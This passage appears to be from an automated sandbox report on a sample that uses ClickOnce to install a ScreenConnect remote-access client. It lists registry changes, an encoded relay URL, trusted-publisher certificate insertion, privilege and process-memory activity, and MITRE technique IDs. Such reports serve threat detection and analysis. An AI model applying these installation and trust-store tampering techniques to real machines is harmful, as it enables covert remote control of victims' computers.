000a003c002f0050006f006c00690063007900530074006100740065006d0065006e0074003e000d000a003c002f00440065006600610075006c0074004700720061006e0074003e000d000a003c004500780074007200610049006e0066006f00200044006100740061003d00220030003000300031003000300030003000300030004600460046004600460046004600460030003100300030003000300030003000300030003000300030003000300030003000430030003200300030003000300030003000350037003500330037003900370033003700340036003500360044003200450035003700360039003600450036003400360046003700370037003300320045003400360036004600370032003600440037003300320043003200300035003600360035003700320037003300360039003600460036004500330044003300340032004500330030003200450033003000320045003300300032004300320030003400330037003500360043003700340037003500370032003600350033004400360045003600350037003500370034003700320036003100360043003200430032003000350030003700350036003200360043003600390036003300340042003600350037003900350034003600460036004200360035003600450033004400360032003300370033003700360031003300350036003300330035003300360033003100330039003300330033003400360035003300300033003800330039003000350030003100300030003000300030003000330030003500330037003900370033003700340036003500360044003200450035003300360035003600330037003500370032003600390037003400370039003200450035003000360046003600430036003900360033003700390032004500340031003700300037003000360043003600390036003300360031003700340036003900360046003600450035003400370032003700350037003300370034003400350037003800370034003700320036003100340039003600450036003600360046003000310030003000300030003000300031003800370032003600350037003100370035003600350037003300370034003700330035003300360038003600350036004300360043003400390036004500370034003600350036003700370032003600310037003400360039003600460036004500300030003000310030003200300030003000300030003000300030003000420022002f003e000d000a003c002f004100700070006c00690063006100740069006f006e00540072007500730074003e000d000a000000	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2629364133-3182087385-364449604-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a\Transform = 01	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2629364133-3182087385-364449604-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471\lock!18000000dbcb570ebc0b00007c1200000000000000000000 = 30303030306262632c30316462313334306137393135653862	ScreenConnect.WindowsClient.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2629364133-3182087385-364449604-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\lock!12000000dbcb570ebc0b00007c1200000000000000000000 = 30303030306262632c30316462313334306137393135653862	ScreenConnect.WindowsClient.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2629364133-3182087385-364449604-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0002_none_399c0f24bfe6e975\lock!10000000dbcb570ebc0b00007c1200000000000000000000 = 30303030306262632c30316462313334306137393135653862	ScreenConnect.WindowsClient.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629364133-3182087385-364449604-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\StateStore_RandomString = "5KXJG2ZZ0ML99QKGDEA6ODWG"	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-2629364133-3182087385-364449604-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{60051b8f-4f12-400a-8e50-dd05ebd438d1}\scre..tion_25b0fbb6ef7eb0	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2629364133-3182087385-364449604-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{60051b8f-4f12-400a-8e50-dd05ebd438d1}\scre..tion_25b0fbb6ef7eb0 = 68747470733a2f2f686f74656c64656c61706c6167652d7069726961632e73637265656e636f6e6e6563742e636f6d2f42696e2f53637265656e436f6e6e6563742e436c69656e742e6170706c69636174696f6e2353637265656e436f6e6e6563742e57696e646f7773436c69656e742e6170706c69636174696f6e2c2056657273696f6e3d32342e322e31302e383939312c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2629364133-3182087385-364449604-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\Files\ScreenConnect.WindowsBackstageShell.exe_89 = 01	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-2629364133-3182087385-364449604-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a\Files	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-2629364133-3182087385-364449604-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment	ScreenConnect.WindowsClient.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2629364133-3182087385-364449604-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\identity = 53637265656e436f6e6e6563742e57696e646f7773436c69656e742e6578652c2056657273696f6e3d32342e322e31302e383939312c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c2c20747970653d77696e3332	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2629364133-3182087385-364449604-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106\SizeOfStronglyNamedComponent = 3c72080000000000	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2629364133-3182087385-364449604-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0002_37b206287e3c9de1\lock!110000002fcb570e6c1200008412000000000000000000001d358 = 30303030313236632c30316462313334306135313634626361	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-2629364133-3182087385-364449604-1000_Classes\Software\Microsoft\Windows\CurrentVersion	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\S-1-5-21-2629364133-3182087385-364449604-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Applications	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-2629364133-3182087385-364449604-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2629364133-3182087385-364449604-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\Files\ScreenConnect.WindowsBackstageShell.exe.co = 01	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2629364133-3182087385-364449604-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436\DigestMethod = 01	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2629364133-3182087385-364449604-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106\identity = 53637265656e436f6e6e6563742e436f72652c2056657273696f6e3d32342e322e31302e383939312c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d344231344330313543383743314144382c2070726f636573736f724172636869746563747572653d6d73696c	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-2629364133-3182087385-364449604-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0002_none_399c0f24bfe6e975	ScreenConnect.WindowsClient.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2629364133-3182087385-364449604-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\NonCanonicalData	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2629364133-3182087385-364449604-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0002_37b206287e3c9de1\appid = 68747470733a2f2f686f74656c64656c61706c6167652d7069726961632e73637265656e636f6e6e6563742e636f6d2f42696e2f53637265656e436f6e6e6563742e436c69656e742e6170706c69636174696f6e2353637265656e436f6e6e6563742e57696e646f7773436c69656e742e6170706c69636174696f6e2c2056657273696f6e3d32342e322e31302e383939312c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c2f53637265656e436f6e6e6563742e57696e646f7773436c69656e742e6578652c2056657273696f6e3d32342e322e31302e383939312c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c2c20747970653d77696e3332	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2629364133-3182087385-364449604-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106\implication!scre..tion_25b0fbb6ef7eb094_0018.0002_acd = 68747470733a2f2f686f74656c64656c61706c6167652d7069726961632e73637265656e636f6e6e6563742e636f6d2f42696e2f53637265656e436f6e6e6563742e436c69656e742e6170706c69636174696f6e2353637265656e436f6e6e6563742e57696e646f7773436c69656e742e6170706c69636174696f6e2c2056657273696f6e3d32342e322e31302e383939312c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2629364133-3182087385-364449604-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436\SizeOfStronglyNamedComponent = 4a621a0000000000	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-2629364133-3182087385-364449604-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_37b206287e3c9de1\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2629364133-3182087385-364449604-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\Files\ScreenConnect.WindowsClient.exe_6492277df2 = 01	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-2629364133-3182087385-364449604-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_37b206287e3c9de1\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-2629364133-3182087385-364449604-1000_Classes\Software	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\S-1-5-21-2629364133-3182087385-364449604-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Applications	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\S-1-5-21-2629364133-3182087385-364449604-1000_Classes\Software\Microsoft\Windows\CurrentVersion	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-2629364133-3182087385-364449604-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Categories	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2629364133-3182087385-364449604-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb0 = 30000000	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2629364133-3182087385-364449604-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0002_none_399c0f24bfe6e975\implication!scre..tion_25b0fbb6ef7eb094_0018.0002_acd = 68747470733a2f2f686f74656c64656c61706c6167652d7069726961632e73637265656e636f6e6e6563742e636f6d2f42696e2f53637265656e436f6e6e6563742e436c69656e742e6170706c69636174696f6e2353637265656e436f6e6e6563742e57696e646f7773436c69656e742e6170706c69636174696f6e2c2056657273696f6e3d32342e322e31302e383939312c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-2629364133-3182087385-364449604-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_acde72cb5eb3cdc9	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2629364133-3182087385-364449604-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436\Transform = 01	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-2629364133-3182087385-364449604-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\Files	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2629364133-3182087385-364449604-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Applications\scre..tion_25b0fbb6ef7eb094_0018.0002_37b206287e3c9de1\PreparedForExecution = 01	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-2629364133-3182087385-364449604-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata	ScreenConnect.WindowsClient.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2629364133-3182087385-364449604-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_37b206287e3c9de1\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15 = 01	dfsvc.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629364133-3182087385-364449604-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\OnlineAppQuotaUsageEstimate = "3580236"	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2629364133-3182087385-364449604-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471\lock!0c0000002fcb570e6c120000841200000000000000000000 = 30303030313236632c30316462313334306135313634626361	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2629364133-3182087385-364449604-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0002_37b206287e3c9de1\lock!1d000000dbcb570ebc0b00007c12000000000000000000003a6fa = 30303030306262632c30316462313334306137393135653862	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\S-1-5-21-2629364133-3182087385-364449604-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Visibility	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2629364133-3182087385-364449604-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb0 = 680074007400700073003a002f002f0068006f00740065006c00640065006c00610070006c006100670065002d007000690072006900610063002e00730063007200650065006e0063006f006e006e006500630074002e0063006f006d002f00420069006e002f00530063007200650065006e0043006f006e006e006500630074002e0043006c00690065006e0074002e006d0061006e00690066006500730074000000	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2629364133-3182087385-364449604-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a\DigestValue = 35a6f5eb87179eb7252131a881a8d5d4d9906013	dfsvc.exe

Modifies system certificate store 2 TTPs 5 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\USER\S-1-5-21-2629364133-3182087385-364449604-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\4C2272FBA7A7380F55E2A424E9E624AEE1C14579\Blob = 0300000001000000140000004c2272fba7a7380f55e2a424e9e624aee1c145792000000001000000640700003082076030820548a00302010202100b9360051bccf66642998998d5ba97ce300d06092a864886f70d01010b05003069310b300906035504061302555331173015060355040a130e44696769436572742c20496e632e3141303f060355040313384469676943657274205472757374656420473420436f6465205369676e696e67205253413430393620534841333834203230323120434131301e170d3232303831373030303030305a170d3235303831353233353935395a3065310b30090603550406130255533110300e06035504081307466c6f72696461310e300c0603550407130554616d706131193017060355040a1310436f6e6e656374776973652c204c4c433119301706035504031310436f6e6e656374776973652c204c4c4330820222300d06092a864886f70d01010105000382020f003082020a0282020100ec489826d08d2c6de21b3cd3676db1e0e50cb1ff75ff564e9741f9574aa3640aa8297294a05b4db68abd0760b6b05b50ce92ff42a4e390be776a43e9961c722f6b3a4d5c880bcc6a61b4026f9137d36b2b7e9b86055876b9fa860dbcb164fe7f4b5b9de4799ae4e02dc1f0bee01e5d032933a2827388f8db0b482e76c441b1bd50909ef2023e1fb62196c994ce052266b28cd89253e6416044133139764db5fc45702529536bf82c775f9ec81fa27dc409530325f40cdef95b81b9ce0d42791cee72e7bd1b36c257b52257c65a28970e457513989434bfc239e2992b193e1b3cc3f11ccdd1d26d4ec9845099ab913906a42069af999c0071169b45a2ea1aa666f1904e8acb05e1823a359a291fd46b4ef7aed5935bb6ab17ebf077210726930c90f01761d6544a94e8fa614cc41d817eec734b1c3d3afb7c58fb256f0c09edc1459bddbff9940ed1958570265d67af79a9b6a16affd70fc6328c9810d5dc186e39af6fbcad49a270f237e6bcd5de0bc014bc3179cd79776591340311a42ca94f33416c2e01b59bd1d71de86ace6716bc90b2d7695d155039aa08fbac19a4d93fb784230a20a485287a16355645fc09142c602d140fa046b7bfd75328184ff7bdf8f9e0d65e6201c8d242931047f59bd328ac353777ccefa60408887b84fc3631301463461a1d73c0b5cc74d6d82905ddf923bdbab027a311cc38d3fa16f639a50203010001a382020630820202301f0603551d230418301680146837e0ebb63bf85f1186fbfe617b088865f44e42301d0603551d0e04160414338ce10a6e06d9c6ed0bc6cae736cefb8188646a300e0603551d0f0101ff04040302078030130603551d25040c300a06082b060105050703033081b50603551d1f0481ad3081aa3053a051a04f864d687474703a2f2f63726c332e64696769636572742e636f6d2f4469676943657274547275737465644734436f64655369676e696e6752534134303936534841333834323032314341312e63726c3053a051a04f864d687474703a2f2f63726c342e64696769636572742e636f6d2f4469676943657274547275737465644734436f64655369676e696e6752534134303936534841333834323032314341312e63726c303e0603551d20043730353033060667810c0104013029302706082b06010505070201161b687474703a2f2f7777772e64696769636572742e636f6d2f43505330819406082b06010505070101048187308184302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d305c06082b060105050730028650687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274547275737465644734436f64655369676e696e6752534134303936534841333834323032314341312e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820201000ad79f00cf4984864c8981ecce8718aa875647f6a74608c968e16568c7aa9d711ed7341676038067f01330c91621b27a2a8894c4108c268162a31f13f9757a7d6bb3c6f19bf27c3a29896d712d85873627d827cd6471761444fabf1d31e903f791143c5b4ce5e7444aacba36d759aeba3069d195226755cbc675aa747f77596c53c96e083c45bba24479d6845eea9f2b28ba29b4dcf0bcf14aa4ce176c24e2c1b8fec3ee16e1c086db6fda97388859e83be65c03f701395b78b842c6dd1533ef642cca6fe50f6337d3f2dfedd8b28f2b28e0c98edd2151392e7cc75489f48859f1de14c81b306eb50eed7bb78be30eaada76767c4ca523a11eec5a2372d6122926ab1801a6a6778e9504791487ee47d4577154988802070f80fc535957658f954cd083546c5afb5a6567b6761275f5db20f70ab86feef94c7cfc65369d325121b69a82399bc7dc1962416f0f05cf1eee64d495a3527e464e2c68da0187093f97b673e43dddbcc067e00713f1565fcff8c3772d44b40a04e600644f22a990345f9a6b5b52963e82c81a0ce91d43a230f67b37d8debda40ea3d59d305e18adc1976516c12a8ba2bca24143b12e9527b4dca58872aa9b3a8c6ac563fc2dc02bf51be889516d35a4ba9d062417b5bdcc50ba945fae26b60d6aec03984798a6a21d3ff793cc0849e81ed55b8027411c50db776ae8feef2fdc2dafb04345261dedc054	5f4a10d73a8cccc33489fceb51a4ea80b2030484dbc94f62c733ddcde0c855eaN.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2629364133-3182087385-364449604-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C	5f4a10d73a8cccc33489fceb51a4ea80b2030484dbc94f62c733ddcde0c855eaN.exe
Key created	\REGISTRY\USER\S-1-5-21-2629364133-3182087385-364449604-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C	5f4a10d73a8cccc33489fceb51a4ea80b2030484dbc94f62c733ddcde0c855eaN.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2629364133-3182087385-364449604-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C\Blob = 0300000001000000140000007b0f360b775f76c94a12ca48445aa2d2a875701c2000000001000000b4060000308206b030820498a003020102021008ad40b260d29c4c9f5ecda9bd93aed9300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3231303432393030303030305a170d3336303432383233353935395a3069310b300906035504061302555331173015060355040a130e44696769436572742c20496e632e3141303f060355040313384469676943657274205472757374656420473420436f6465205369676e696e6720525341343039362053484133383420323032312043413130820222300d06092a864886f70d01010105000382020f003082020a0282020100d5b42f42d028ad78b75dd539591bb18842f5338ceb3d819770c5bbc48526309fa48e68d85cf5eb342407e14b4fd37843f417d71edaf9d2d5671a524f0ea157fc8899c191cc81033e4d702464b38de2087d347d4c8057126b439a99f2c53b1ff2efcb475a13a64cb3012025f310d38bb2fb08f08ae09d09c065a7fa98804935873d5119e8902178452ea19f2ce118c21accc5ee93497042328ffbc6ea1cf3656891a24d4c8211485268de10bd14575de8181365c57fb24f852c48a4568435d6f92e9caa0015d137fe1a0694c27cc8ea1b32e6cac2f4a7a3030e74a5af39b6ab6012e3e8d6b9f731e1dcade418a0d8c1234747b3a10f6ea3ab6d9806831bb76a672dd2bd441a9210818fb03b09d7c79b325ac2ff6a60548b49c193ede1b45ce06feb26f98cd5b2f93810e6eace91f5bed3fb6f9361345cbc93452883362a66285fb073ce8b262506b283d45cf615194ced62e05e33f2e8e8ec0aa7b0032b91b23679bef7ad081e75a665ccbbe34850f377911afedb50a246c8615898f57c02163c8328ad3986ecd4b70d53d0f847e675308dec30937614a65b4b5d74614d3f129176debf58cb72102941f0d5c56d267668114113589adc262b01f4894d59db78cf814a3e40475fc98150738510232159608a6454c1cc211ae838197c661ccd78384530994fff634f4cbbaa0d0853417c583d47b3fab6ec8c320902cc6c3c0c56110203010001a38201593082015530120603551d130101ff040830060101ff020100301d0603551d0e041604146837e0ebb63bf85f1186fbfe617b088865f44e42301f0603551d23041830168014ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300e0603551d0f0101ff04040302018630130603551d25040c300a06082b06010505070303307706082b06010505070101046b3069302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304106082b060105050730028635687474703a2f2f636163657274732e64696769636572742e636f6d2f446967694365727454727573746564526f6f7447342e63727430430603551d1f043c303a3038a036a0348632687474703a2f2f63726c332e64696769636572742e636f6d2f446967694365727454727573746564526f6f7447342e63726c301c0603551d20041530133007060567810c01033008060667810c010401300d06092a864886f70d01010c050003820201003a23443d8d0876ee8fbc3a99d356e0021aa5f84834f32cb6e67466f79472b100caaf6c302713129e90449f4bfd9ea37c26d537bc3a5d486d95d53f49f427bb16814550fd9cbdb685e0767e3771cb22f75aaa90cff5936ae3eb20d1d55079889a8a8ac1b6bda148187edcd8801a111918cd61998156f6c9e376e7c4e41b5f43f83e94ff76393d9ed499cf4add28eb5f26a1955848d51afed7273ffd90d17686dd1cb0605cf30da8eee089a1bd39e1384eda6ebb369dfbe521535ac3cae96af1a23edb43b833c84f38149299f5ddce546dd95d02141f40337c03e295b2c221757352cb46d8c4341ca2a54b8dcd6f76372c853f1ace26e918be9007b0437f9588208270f0cccaeffd29355c1f893855f7378a8b09a1cb0be9311aff2e195c3971e1be9ca70a06d62667b792e64e5fde7aac49cf2ea47492addb3ca49c861fe3c1561b2b23ff8fb5ea887b706be6a0bafd3a3f45a6c4e81691528b41c048844b964dab4440e38df01528ceedf11856072a2f10c40c08643c338fae288c3ccb8f880b0dbf3bf4ce1e7b8eefb5ebcbb7f07713e6e7283fac12aea52f226c41f9825c1566cc6c0ecac586c3f626330c074ba0d307026a6a4030484b34a85120bbad1b8508e2590d6dca05502bea4a1c9ea5fda0a71f0674e7f2d65290fdaf854821f9573bb49c03ed8645f4b4616ebf68e2266086eac8afa9fe941de7631b3a8656784e	5f4a10d73a8cccc33489fceb51a4ea80b2030484dbc94f62c733ddcde0c855eaN.exe
Key created	\REGISTRY\USER\S-1-5-21-2629364133-3182087385-364449604-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\4C2272FBA7A7380F55E2A424E9E624AEE1C14579	5f4a10d73a8cccc33489fceb51a4ea80b2030484dbc94f62c733ddcde0c855eaN.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1020	ScreenConnect.ClientService.exe
1020	ScreenConnect.ClientService.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	4716	dfsvc.exe
Token: SeDebugPrivilege	1020	ScreenConnect.ClientService.exe

Suspicious use of FindShellTrayWindow 9 IoCs

pid	Process
1016	ScreenConnect.WindowsClient.exe
1016	ScreenConnect.WindowsClient.exe
1016	ScreenConnect.WindowsClient.exe
1016	ScreenConnect.WindowsClient.exe
1016	ScreenConnect.WindowsClient.exe
1016	ScreenConnect.WindowsClient.exe
1016	ScreenConnect.WindowsClient.exe
1016	ScreenConnect.WindowsClient.exe
1016	ScreenConnect.WindowsClient.exe

Suspicious use of SendNotifyMessage 9 IoCs

pid	Process
1016	ScreenConnect.WindowsClient.exe
1016	ScreenConnect.WindowsClient.exe
1016	ScreenConnect.WindowsClient.exe
1016	ScreenConnect.WindowsClient.exe
1016	ScreenConnect.WindowsClient.exe
1016	ScreenConnect.WindowsClient.exe
1016	ScreenConnect.WindowsClient.exe
1016	ScreenConnect.WindowsClient.exe
1016	ScreenConnect.WindowsClient.exe

Suspicious use of WriteProcessMemory 11 IoCs

description	pid	Process	procid_target
PID 4808 wrote to memory of 4716	4808	5f4a10d73a8cccc33489fceb51a4ea80b2030484dbc94f62c733ddcde0c855eaN.exe	84
PID 4808 wrote to memory of 4716	4808	5f4a10d73a8cccc33489fceb51a4ea80b2030484dbc94f62c733ddcde0c855eaN.exe	84
PID 4716 wrote to memory of 3004	4716	dfsvc.exe	92
PID 4716 wrote to memory of 3004	4716	dfsvc.exe	92
PID 4716 wrote to memory of 3004	4716	dfsvc.exe	92
PID 3004 wrote to memory of 3872	3004	ScreenConnect.WindowsClient.exe	93
PID 3004 wrote to memory of 3872	3004	ScreenConnect.WindowsClient.exe	93
PID 3004 wrote to memory of 3872	3004	ScreenConnect.WindowsClient.exe	93
PID 1020 wrote to memory of 1016	1020	ScreenConnect.ClientService.exe	95
PID 1020 wrote to memory of 1016	1020	ScreenConnect.ClientService.exe	95
PID 1020 wrote to memory of 1016	1020	ScreenConnect.ClientService.exe	95

C:\Users\Admin\AppData\Local\Temp\5f4a10d73a8cccc33489fceb51a4ea80b2030484dbc94f62c733ddcde0c855eaN.exe
"C:\Users\Admin\AppData\Local\Temp\5f4a10d73a8cccc33489fceb51a4ea80b2030484dbc94f62c733ddcde0c855eaN.exe"
1⤵
- Manipulates Digital Signatures
- System Location Discovery: System Language Discovery
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:4808
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
  2⤵
  - Modifies registry class
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4716
